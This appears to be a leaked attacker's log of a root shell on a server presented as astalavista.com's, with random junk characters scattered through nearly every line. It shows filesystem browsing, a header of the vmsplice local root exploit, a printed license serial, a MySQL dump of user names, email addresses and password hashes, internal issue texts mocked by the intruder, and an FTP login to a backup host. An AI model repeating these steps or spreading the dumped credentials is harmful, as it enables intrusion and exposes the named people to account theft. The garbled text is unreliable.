( i" l6 B W5 c* F% M: W) A2 e$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish) x3 G( y- `, t8 j7 K
?> V* X* ^# k, u1 K, G% W
7 s8 L1 v: y8 g; j! Q+ L% t8 `
sh-3.2# cd ..
$ i' p; z4 h. `7 X1 W9 Fsh-3.2# cd com, `1 p) Q# o9 {$ c* d& m* R
sh-3.2# ls -la
5 ^# ~3 S3 B" u$ b. n8 Ytotal 1412087 T2 ~. @8 [. `' H8 W
drwx–x–x 10 com com 4096 Apr 28 12:40 .( I& |6 U) c& X6 ~5 u
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
! {1 C: ]4 P, a! s7 U% Edrwx—— 2 com com 4096 Jun 4 04:04 backups8 b. `+ P3 Y' L( S
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql( ^& b b$ i/ D0 `& x; S
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system" M0 F d2 E- h f" _
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history( x. l" F# }" c ^. l
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
8 f% W. B2 S7 ?7 P1 z-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile/ H* o3 I E$ o4 ~
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
6 A# y! k9 b9 B9 y. u \1 i2 b; Zdrwx–x–x 3 com com 4096 Jan 29 2008 domains. {0 m5 f; R+ c4 G+ V
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
7 F- d+ A! z. J' d; edrwxrwx— 3 com mail 4096 Jan 6 19:24 imap" H4 _+ H( y' G: W
-rw——- 1 com com 69 Nov 18 2008 .lesshst1 ?/ \) ^) m: C% n5 {$ S
drwx—— 2 com com 4096 Sep 24 2007 mail1 K3 |. U5 @" {2 ?7 K2 X( |" E
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
3 L% \/ l7 t$ ?drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
# L3 T' ?3 B6 P; Alrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html; c4 ]& R$ I& U5 o0 K$ V8 D, U
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
, }" ^3 W: ]4 gdrwx—— 2 com com 4096 Aug 26 2008 .ssh
7 p) V ?7 R1 H" m-rwx—— 1 com com 8515 Feb 10 2008 t
' @. M& {- B" M; M, z8 I' n- O-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c0 B6 H0 B5 ^2 U3 o9 P2 ?
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
- R U# O6 N5 j" V" T3 G! Y-rw-rw-r– 1 com com 617 May 20 2008 .toprc3 u& d0 r2 ~7 T. d
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql3 w. u0 S6 U- a, J/ R1 B
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
9 u4 o/ e) A! P* w; Q3 m( v-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
5 ]& l+ k7 V# V( e& A1 v M0 k; k5 s
sh-3.2# head t.c
5 r9 t, @; V# y/*7 D# k* [! ~9 [& M( q
* jessica_biel_naked_in_my_bed.c% `( ?9 V5 f) J# i+ I; t8 Z
*
9 k) b1 b9 i" M/ u2 L5 m* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.9 M6 V8 g3 y& F) X+ X
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.4 i+ m5 v" H* S f+ V
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
3 Z9 r1 m) T4 H2 M2 t' ]*
; S* u+ b2 `3 X1 H- N* d* Linux vmsplice Local Root Exploit
3 q( A' h# k/ a' N6 b/ u# k; I1 y# t* J* By qaaz
/ ?7 e% N) e* z9 `' M% l*+ t$ w. q1 H( u6 `8 A# t# R
/ n9 L% H) s: osh-3.2# cd /
+ X8 D9 R) ^" f- msh-3.2# ls -la& S. o F% T* _) G
total 360
% [5 u, e0 ^& l3 K. D; x5 Ydrwxr-xr-x 25 root root 4096 Jun 3 02:43 .
1 A% @2 l( P3 Mdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
- z4 Q) W7 _) n7 U6 e: I) o" t8 |-rw——- 1 root root 10240 Jun 3 02:39 aquota.group* F; E" y p: H4 ]1 g- D
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
1 ~) ]* l, d& k. @-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
4 X' f, c( g+ A1 c- x- c+ a-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
l: J7 {3 T. g-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel m2 @0 _6 b3 ?: `: z/ o$ k+ K+ [
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
6 N' g) w' l" D0 E/ @$ T" Mdrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
; c. O7 `" c2 r/ B: W1 Z; L! M) h7 s7 Ndrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
$ _$ [1 ~% L3 w& J7 P4 W* l# Ndrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
: O* v9 x- @4 Qdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc* O# B/ g4 {3 d. C1 E0 n
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
3 N: m" |: I' q F% P1 l4 x( z-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
$ x+ d M' J7 p* u+ [% @drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
! ~) ?4 J+ `8 ^& x% X8 V" Idrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64- J+ a0 Q9 r( n0 e) h9 c
drwx—— 2 root root 16384 Sep 11 2007 lost+found/ `( e. ~1 D6 ^+ o7 k
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media. d8 E/ o; a8 c1 W. j) J
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
4 j, m- e( g W- j4 h% [drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt, O$ w6 u5 A7 @0 `! {( m
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
p: ~4 Q) w" Q' h0 d: kdrwxr-xr-x 2 root root 0 Jun 3 02:43 net) X, ?8 ]. P- G$ v8 ~1 N. _# u
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
; u# {8 F1 ?4 Ldr-xr-xr-x 264 root root 0 Jun 3 02:42 proc8 D, T' \' p2 c8 ^' V6 D
drwxr-x— 15 root root 4096 Jun 4 08:40 root& b3 `# T3 @3 o6 @5 e
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
' C* s* N; F- L" V/ [' f/ ]drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
# F9 o% Q; I4 [# z3 udrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
3 K% T1 C% n# Y7 o V8 o Z" Ydrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
+ R7 ~0 d# Z8 c: {- ydrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp% u7 M9 J% a& G5 L+ f2 c
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
! m2 ~ w J0 J/ Cdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var% U: |5 [2 T1 d; {5 t1 C5 Y/ G
# W2 U6 @1 N4 B8 T
sh-3.2# cd opt
* q) x$ n C; y/ `$ w& {sh-3.2# ls -la. T9 X3 n; X5 v2 Y# X! l5 z7 C
total 20
; f) |& ^- \7 S% P9 Ydrwxr-xr-x 3 root root 4096 Mar 11 17:56 .3 i- @; b( E6 x6 j! i
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
' c b9 E& u7 m$ t" s% E I# p) pdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
# e% ]3 C/ l( n2 i8 R: W2 T" e4 W* q+ Q$ K8 J/ d- |
sh-3.2# cd lsws/0 ^& `: O) [' L" J9 Q3 \3 N0 Q
sh-3.2# ls -la
6 x& e: k2 D9 b* S& ?) W l/ ztotal 108
* L' H7 M4 _8 X+ H+ B7 x/ zdrwxr-xr-x 15 root root 4096 Mar 20 2008 ., g( Y4 b# Q; j) g& Z2 T
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..9 V4 u$ Q1 b( y5 P$ R
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons' Z9 }8 T) ^3 v8 z2 M( s9 K+ t9 d. @
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
, a+ `( W, i; q- j: l* M1 x. wdrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
9 Z' |: `2 G, Q+ d; N/ xdrwxr-xr-x 2 root root 4096 May 29 15:10 bin
/ b+ {& N( I- zdrwx—— 4 apache apache 4096 Jun 3 02:43 conf
- g3 E# ]) D! V; F. zdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
( d; c, N( j( K @drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
( \5 }6 M e9 \! z$ x9 c* o- [2 Udrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin8 m: ~- O* v% r. N% a
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib* m7 @0 l0 Q+ I$ L: j( Q+ h
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE* P2 N7 R) o o; I4 x# X# }- t
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
" N1 ^$ A- b- c8 r: {-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
, Z) z1 l* y3 |$ o$ c0 _-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
5 Q8 q. X3 i) f: q! L& B- @drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
0 L, _. `% c8 `- ddrwxr-xr-x 2 root root 4096 Mar 20 2008 php
S! x8 C7 G2 }6 v6 n9 |drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
5 e/ Q7 z; x+ a% ~) G2 @drwxr-xr-x 3 root root 4096 Mar 20 2008 share
* t; x& j' [" m% t' x& V-rw-r–r– 1 root root 6 May 29 15:10 VERSION0 E: N6 j$ P# m* ?- O
. n0 R& {# U( E( t
sh-3.2# cd conf
! M' |" z6 _' J% u5 T& fsh-3.2# ls -la1 w- B. }% b2 A, G
total 48
y; I2 V* h) Rdrwx—— 4 apache apache 4096 Jun 3 02:43 .
) |* t. Y6 r/ o# Sdrwxr-xr-x 15 root root 4096 Mar 20 2008 .." ]: W2 V- f3 a K" m; {( j$ T" L
drwx—— 2 apache apache 4096 Mar 20 2008 cert
7 M f, Z; x2 W' j V/ b' s7 o-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml: J; g/ J) G5 a0 N1 X7 {& N- m
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
. `3 X2 B* r: K2 l# R-rw-r–r– 1 root apache 0 Jun 3 14:11 .last- _; I2 I3 j0 a0 H' f4 j' V9 Z6 q
-rw——- 1 apache apache 256 May 29 15:10 license.key: L* A, v! K, g
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old) u, R- X5 v' G+ }8 |
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
9 ]! t' u8 @4 w! i/ S& i-rw——- 1 apache apache 20 May 29 15:10 serial.no* A; c6 ]8 P& K5 U
drwx—— 2 apache apache 4096 Mar 20 2008 templates
& J' L: F, Z& A0 j! b8 O: g9 K* f' }, p6 @+ K. q1 g7 W' S5 d
sh-3.2# cat serial.no( M; |" z. j7 K" S* J
IbDl-oVsO-CKqL-wVRa
" c# x5 {" A# u! Z' k6 U$ I7 |5 S1 ^" |- q" w, m; d
sh-3.2# mysql1 J5 s/ `) S% `
Welcome to the MySQL monitor. Commands end with ; or \g.: a% `+ w4 e7 K8 Q, e3 \/ x( _5 A4 e
Your MySQL connection id is 286844
- G1 \ R0 }9 p+ S9 X) H$ JServer version: 5.0.45-community-log MySQL Community Edition (GPL)
; p5 s& k/ w- e) T; I* n7 r0 c& e- d" ^2 A2 ~
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
e7 q- \$ {+ v; ?" a2 ?9 t: \4 f$ x7 i& R2 ^" B
mysql> show databases;
+ P' h6 I5 Z7 P8 k# |+———————–+
2 I \# z" V7 Y+ }| Database |2 A7 [% b0 M7 F) n) P
+———————–+
/ G- \" ? k# g/ s9 f9 l| information_schema |6 B8 k2 M5 v5 g2 u: l
| astanet_ads |
) y% A$ [) B# a1 P| astanet_mailing_lists |
( ]- @" @! T0 ?6 ]" C| astanet_mediawiki |
" V/ b; j0 a% j. I3 m| astanet_membersystem |
' ^5 B+ }( s1 }3 ^| com_contrexx |% G8 V' v( i5 M0 ]- v: G3 a+ K0 j
| com_contrexx2 |8 c+ @% r7 W; V" ~& w9 i* j
| com_contrexx2_live |- ~ W9 u v; q. K& o. M! J
| da_roundcube |; y; A7 ?1 W7 u" m) g3 Q+ l2 r
| dolphin |
' Z1 m# i, w4 R0 z+ T: r| ideapool |
4 Z5 l- G" c5 A$ x" _| mysql |' k) ~8 E! u8 i; C# l1 s5 H
| test |
2 L! ~% m9 }& T- \* ^- ^3 b' p) t| yourmaster |
% Z) O2 h- \. q- ?! O9 c3 a+———————–+" q8 o, z: I* Z
14 rows in set (0.00 sec)% j) O$ ]1 M1 j
' j9 z r4 O0 x6 [" \. m, vmysql> use ideapool
6 S4 A# [# h% v$ o, UDatabase changed
4 t9 {2 W- k* O: ?$ Fmysql> show tables;( T. T* y3 B7 F
+———————————–+
* a9 y" o4 V1 D4 d. D8 q) ?( y| Tables_in_ideapool |
4 a8 f% |" L7 [7 ?: }% P' C6 g. _+———————————–+: u8 r: _* B# o: F
| eventum_columns_to_display |
' B1 w9 t+ `- a0 a| eventum_custom_field |
2 n" F% g' P& s! J5 k+ U| eventum_custom_field_option |8 S( n; |. t V& z4 d
| eventum_custom_filter |4 |! Z0 S: r x0 u3 A4 p
| eventum_customer_account_manager |; v% `$ P" v4 `$ f5 p! L7 P. _
| eventum_customer_note |$ X5 E. B( g8 h( V5 r$ J
| eventum_email_account |# B1 O, b$ H0 y3 j8 @; F
| eventum_email_draft |3 l, m% S: n8 E8 v1 P, g
| eventum_email_draft_recipient |+ `8 }, @/ g! l. C5 M
| eventum_email_response |! z8 Q N( p- w2 w. K4 y
| eventum_faq |
& i( q1 h# z& c6 H! ^! e& V' I; E| eventum_faq_support_level |
. j: J2 r" c p2 m/ || eventum_group |9 V9 x3 F# m6 b8 j2 A3 i
| eventum_history_type |
; f- K& Q- n( E# b* m| eventum_irc_notice |
/ ]+ N; Z( t {0 C| eventum_issue |$ I3 K8 l& S. P" l" t" h0 Z1 L" x% D
| eventum_issue_association |
" u& J/ D5 g, z& I| eventum_issue_attachment |
# J6 H. }9 r4 {; A* }: R| eventum_issue_attachment_file |
Z3 u2 x; g* ^# u| eventum_issue_checkin |
1 f- p! g9 W5 ~- f" X6 z' H2 Z6 ^| eventum_issue_custom_field |8 L# V& [3 A. h" k4 E! s3 R8 p
| eventum_issue_history |% v0 U5 k4 Q; S, ]$ R
| eventum_issue_quarantine |
m3 }8 R( [3 _/ H8 ]8 u4 A* g| eventum_issue_requirement |
, }/ e6 b$ [# a' a: {; t+ l| eventum_issue_user |1 Q$ ]2 ?' N5 a w# u, F
| eventum_issue_user_replier |
8 ?3 _" U: F- \ h# M8 u v6 u3 ?| eventum_link_filter |, ^5 J l5 ~: Y: R3 V8 |3 ~
| eventum_mail_queue |$ `1 @: p. B7 D* R6 s
| eventum_mail_queue_log |
" v$ q9 _4 \3 }2 J, _2 C' ?| eventum_news |
# }% x/ {! x: c ^| eventum_note |7 g, A9 n/ c; \! c& \5 X: S' u0 b
| eventum_phone_support |
% K/ v) c* } {| eventum_project |2 {9 [0 e, G- b3 D( T6 Q* ^
| eventum_project_category |
9 o, X( g0 S3 ^- \" Y1 }9 I4 C: S| eventum_project_custom_field |
3 ?' U1 |4 [2 j. r8 g6 R4 i t6 G| eventum_project_email_response |
D, D; p- I' @2 X! L4 t2 t| eventum_project_field_display | Y# c1 W) y/ a/ X# y& K3 R# T! @( B
| eventum_project_group |
% K" ?' ~4 a0 J* _8 c' P) H| eventum_project_link_filter |
: K$ o; j' x; H4 |/ G- Q+ X* ?. T| eventum_project_news |0 ]- [9 k* b6 K5 f% i
| eventum_project_phone_category |
5 ]9 l) a, g+ r( ]! I1 K| eventum_project_priority |$ d( z) \( e, w2 m: P, `
| eventum_project_release |
# o9 P. T; c1 a, K& ]| eventum_project_round_robin |
9 D6 v* g9 [% Z1 ?* u& k3 P" \; e _| eventum_project_status |: i- H# Y8 e; O& O H
| eventum_project_status_date |
5 w7 R. h% {9 c; r H! P| eventum_project_user |
5 _" M2 ]; j- p# n0 y& b$ b7 P0 [| eventum_reminder_action |
. M4 O$ `- E( |. a' P" }+ b+ q6 b| eventum_reminder_action_list |' a: f x' x8 G; z' p
| eventum_reminder_action_type |
' C0 y8 f* x$ t) L) ~2 i! W* k4 G| eventum_reminder_field |
: C( C4 {6 n6 e| eventum_reminder_history |
( ]) i) O. h/ q) w. _$ g& J, a3 w| eventum_reminder_level |
* a: D! E% S( V! V1 k| eventum_reminder_level_condition |
7 ~8 Q. z( p1 v& G4 V| eventum_reminder_operator |3 q# c) \. _9 h' @9 B
| eventum_reminder_priority |
5 R$ v4 r6 e0 o ~ `8 f| eventum_reminder_requirement |
' T7 V t. B& L5 h5 E, k# h6 t! ?) K| eventum_reminder_triggered_action |
; ~8 N8 ~* ^' l' d2 F7 k4 i| eventum_resolution |$ Y k- z/ N. [2 V
| eventum_round_robin_user |
8 A, w- S. B. b% i+ m. z| eventum_search_profile |
; k- i+ e$ c k2 L. G# c: U| eventum_status |: C. P, V0 E# f3 T& y
| eventum_subscription |/ }/ e" j$ t, N
| eventum_subscription_type |& _- g" ]: E4 K8 I1 P+ p' Z
| eventum_support_email |5 h" q. W: ~3 T I. A5 T6 K8 ~* c
| eventum_support_email_body |
9 z+ G& W. O9 g$ x+ j7 ~. E0 L| eventum_time_tracking |; \, S. t5 M- a3 a
| eventum_time_tracking_category |( v0 O9 a0 _' \9 ?. l
| eventum_user |6 b- x& v% V1 Z$ M& u
+———————————–+
2 d5 {6 P7 w- I8 I" S69 rows in set (0.00 sec)
3 p6 E6 D2 ^1 a/ F% E3 v/ X: y' o& h l( K- q; ?0 W' c
mysql> describe eventum_user;
: U8 r7 {4 J2 \$ S+————————-+——————+——+—–+———————+—————-+1 ~: u6 K4 h$ {
| Field | Type | Null | Key | Default | Extra |0 H7 l8 {& B, P
+————————-+——————+——+—–+———————+—————-+$ `0 j, A Q c
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
% H+ m4 b$ h3 z| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
; S9 G/ s- Y) \* E| usr_customer_id | int(11) unsigned | YES | | NULL | |
3 O5 c- _8 l5 |! Q+ s( @| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |9 {8 C# q( A& ^& @
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
9 o( b. p- U6 m/ D" f| usr_status | varchar(8) | NO | | active | |6 j6 s% l# R- ]# r" u
| usr_password | varchar(32) | NO | | | |
+ u& ?! B8 [* o3 a$ w# C| usr_full_name | varchar(255) | NO | | | |: o0 S$ W) z) K" V) v+ d) Q z6 ~6 ?
| usr_email | varchar(255) | NO | UNI | | |( L8 W* j. |& H9 M6 W6 ^
| usr_preferences | longtext | YES | | NULL | |
2 l) m' b; O$ `8 z$ {| usr_sms_email | varchar(255) | YES | | NULL | |
& ^* {/ Y( z* H; }| usr_clocked_in | tinyint(1) | YES | | 0 | |7 {6 j* @) T+ k8 m
| usr_lang | varchar(5) | YES | | NULL | |; a9 G" ^5 |' n! \
+————————-+——————+——+—–+———————+—————-+) O5 o* {$ N" D
13 rows in set (0.00 sec)1 W p- |9 }3 X6 \2 S" P5 c' q; X" _
# \( G4 u7 F5 T" w2 h. ] ~7 P
mysql> select usr_full_name,usr_email,usr_password from eventum_user;; H& `8 g) i! {; t0 r4 ?
+———————-+——————————-+———————————-+
" A0 W% z7 k# |8 ~$ A| usr_full_name | usr_email | usr_password |
; ~! k' z3 J, u+———————-+——————————-+———————————-+' \! O. [" }. j! ]2 F
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
$ w# j+ r: Q+ O) b w| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |& L6 r+ u+ \+ E) ?8 V. ` s) {9 @
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
% R; {! Y7 `, z! T| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
2 J6 r$ O ]/ C" P| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |5 \8 a- c0 [$ n9 m0 ]* w
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
* k7 j- [5 A+ [, ]5 N0 i* _3 ^0 N5 p| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |+ T; R$ | q/ ?& z5 I, h' X0 o2 I$ o' @
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
; C& V/ i' @" J# J* K| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
( w% q0 q- Z5 T D; X3 _| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
2 o3 M, Z3 i7 g& P9 h5 Q6 V| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
3 J) g% p1 F; G s" V| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |+ k, }8 F5 p9 D9 Q1 S# |
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
4 Z- s; k/ f' E; D| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
- s0 D2 T' w# c2 {# K) h0 `| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
# k6 j. u. _+ B& P9 t- C+———————-+——————————-+———————————-+
T, K0 p9 Q! N0 J/ X' o1 A15 rows in set (0.00 sec)+ R& w: Z1 Q- E1 D, R" t
$ U- u2 D; j- N. g% G( f# nmysql> select iss_description from eventum_issue where iss_id = 43;
+ s: N! i% }% W- s+ i: G+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
6 d0 r% O, l# o E| iss_description 0 j2 Q0 ]! Q- F; @% ]) A& z% F; Z
|
2 } e$ `) M- Y+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+% g4 a; I5 B5 x& ^% s
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be4 Y! m: r- k: O# {; ]6 s, G n1 Z
connected for 90 mins… 120mins… so what i propose is something like:
" ?; h# l9 K) U* M' K链接标记[url]http://www.surfthechannel.com/[/url]
! y! O8 U/ x. G4 vsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system! x: u, d0 D- I
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
9 F+ j' n2 C! w2 }1 M* Q4 c5 f& k* Cbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
9 ?# `" h) t$ E! dif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
: d( Q" R/ R* c" K' B& i# W" K5 w
We could also put advertisement during play on the flash video player itself… extra $$…
8 x* n' r5 ]$ |+ F0 C8 V$ ^
4 d6 |: W. Z/ a( o) d$ l! `By sykadul |( H; u7 P( O* e3 d8 ~
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+' Y9 i, z; Y4 c# W$ X
1 row in set (0.00 sec); h# }# j* E& x
. T) ^4 l% e- F# g/ u' [6 B// Money and extra $$ is all they care about. remember that.
, K3 G* _/ ]5 G5 t9 ]( ~# C( c) J7 }# Q% I
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;+ h7 @1 z& K. b0 H
+————————+——————————————————————————————————————————————————————————————————————————————-+
0 x% D4 H, e+ h6 [& [| iss_summary | iss_description
; F. U/ ]& h- K1 z& M; I|' \$ n) ~! N2 {7 ]
+————————+——————————————————————————————————————————————————————————————————————————————-+
( Y6 V; I/ Z5 S3 G| Forum for REAL EXPERTS | Hello,% d1 z: j8 W. L# @/ O' Y0 O
- R; I: F8 Z, I4 r) \& u, U* |( SIshtus and I,
! \9 [3 T) u3 ~5 n. l2 b
2 }2 b Y8 v6 P2 FCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide7 i" c( r$ H( ^
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
7 ~) i, X" }8 w; B2 P$ |$ S; m2 _2 O; N3 r4 R) x; G
One example a friend of mine from coresecurity.com!, a \. g" x4 ~ ^
) H/ A5 P- s" ], HWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
1 n& V5 h8 v1 z, S5 h. H' A
% ^) @" ^( g& E5 i7 k+ Q% B5 [|
5 I% H. t2 X+ y+ N, I+————————+——————————————————————————————————————————————————————————————————————————————+6 e) m0 f6 V+ X& @5 r: H
1 row in set (0.00 sec). R6 _ O8 c2 o. J+ F1 t
1 e( t" @5 O3 v5 ^$ ~7 i// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
5 t6 F' `/ q# g
& ?7 E. A# z5 G* Smysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
4 k, P: ~, p, X7 K- P4 `+——————+———————————————————————————————+" K+ r8 I7 S+ `5 M9 n
| iss_summary | iss_description |
- ^0 C8 A, R4 z* M( j1 I& t+——————+———————————————————————————————+
+ [8 `8 H/ \* r| Website guidance | Virtual Girl which guides you trought the website.- }( o: Q p3 q2 s0 h
; ]5 D5 D" @3 `4 g9 K
We need a girl with who you can ( talk )!!!
: ]+ x t) @4 R) O7 r$ {+ L0 _Also for the News!
$ }* b N9 }1 C7 d# Z3 YSo my suggestion is a girl who read you the news loud if you like!
8 O* p ~0 n) ], {0 y+ iyou can choose between read yourselfe or she read it for you or both!
2 ^1 B4 ~9 I ]
. }' U) ^8 S' r$ p0 Y. ]Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!! h+ n- s, U- T! X2 g
3 ~( j/ I; Y" t7 n3 R% o
Have a look on the example girls!!
) A- K8 z5 I8 t. J, M& |$ S) h s
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
% n7 z3 _9 z- c8 z: O2 i7 N; c
( S9 z# v. [- X$ v4 a4 Y6 Z. yor that: {" s. S- C. R* D2 m% }9 v/ p
) l" e0 [& c2 z! e5 N7 B( \
链接标记[url]http://www.yellostrom.de/[/url]
7 z$ S7 N7 S0 X A @( s' K5 {0 L( E" n3 M9 n
|1 l; B7 Z8 V4 M1 v, z! q7 _
+——————+———————————————————————————————+6 _( l" W- i; X8 C) r, h* F: o" y6 _
1 row in set (0.00 sec)
7 ?9 v, G9 S& ?$ ]/ }( q+ g0 m* S3 D f
// ha ha.: \% P+ E5 o' s$ U! `( t
0 D |6 \6 l" A. N% Q: n( E9 Jmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;& L/ B" e: P; U/ \- N
+————————–+———————————————————————————————————–+
0 ^7 T* u1 b! X3 Q. i| iss_summary | iss_description |, `% [( h$ q6 r/ X3 Y
+————————–+———————————————————————————————————–+7 x& v& Y0 b# B6 O8 u$ o9 J: O
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
( h8 P# Q+ S) L$ Q: Z" M+————————–+———————————————————————————————————–+
' q, i4 t! c# q% H1 X6 ~+ ?1 row in set (0.00 sec)
* s/ Z2 x3 E' V/ ~6 K' o4 d
u- N9 q* U: q/ W4 Q3 `// LOL.
. q% R+ }9 S; ^5 u$ O% U; t2 i6 U" w6 i
mysql> exit
; p: a7 Z+ f& O- A5 Q9 c4 F4 A/ YBye/ @2 ]9 H3 O+ R; a9 b) b0 J! ]
% T5 ^' O0 N" F5 R! ash-3.2# ftp 212.254.194.163/ n; v, ~8 W. l/ K$ b8 n
Connected to 212.254.194.163.6 }+ t) X% n2 ?4 B3 S# y: F( k" y
220 BackupCOM_VW FTP server ready.
& r' ?" G2 g# x9 G; ~+ c% \504 AUTH: security mechanism ‘GSSAPI’ not supported.
# T( g6 @% U' |* c* |2 H504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
+ O$ L" W" S4 i. f Z1 H: kKERBEROS_V4 rejected as an authentication type
+ m2 Q, L* c$ Q* s* YName (212.254.194.163:root): astalavista.com0 i- Z, p- z- x
331 Password required for astalavista.com.% N& [7 c. C, p2 p' d( I
Password:1 }# h3 D- B* o- m0 y9 n
230 User astalavista.com logged in. c2 |% u. {1 w: G
Remote system type is UNIX.
- G w `/ L, P9 RUsing binary mode to transfer files.
/ M7 K4 P V' S# P- T- G# \3 ]; Iftp> ls -la# Q8 ], b) }* @2 I# t' m
227 Entering Passive Mode (212,254,194,163,2,188)8 c( x3 u0 }( w
